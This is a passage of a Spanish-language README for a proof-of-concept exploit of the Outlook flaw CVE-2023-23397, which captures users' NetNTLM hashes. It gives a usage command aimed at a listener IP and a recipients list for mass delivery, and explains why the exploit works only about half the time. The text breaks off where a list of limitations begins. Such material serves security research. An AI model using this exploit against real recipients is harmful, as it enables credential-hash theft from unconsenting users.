
Prueba de concepto de CVE-2023-23397 para la aplicación cliente de Microsoft Outlook vulnerable.
Prueba de concepto de CVE-2023-23397 para la aplicación cliente vulnerable de Microsoft Outlook. Solo con fines educativos y de investigación.
Este CVE tenía como objetivo recuperar el hash NetNTLM del usuario que ha iniciado sesión desde la versión 2016 del cliente de Microsoft Outlook, excepto la última versión parcheada.
python3 exploit.py -p 192.168.0.5 -f recipients.txt
Menú de ayuda con descripción.
python3 exploit.py -h
El exploit fue escrito para pruebas de entrega masiva y funciona con una probabilidad de 50/50. Esto se debe a que la biblioteca de Python independentsoft.msg para crear citas y objetos para Outlook adjunta el archivo como mensaje y MS Outlook no lo reconoce como nativo. Por eso la obtención del hash no siempre se completa con éxito.
Durante las pruebas me enfrenté a algunos contratiempos técnicos y limitaciones. Estas son: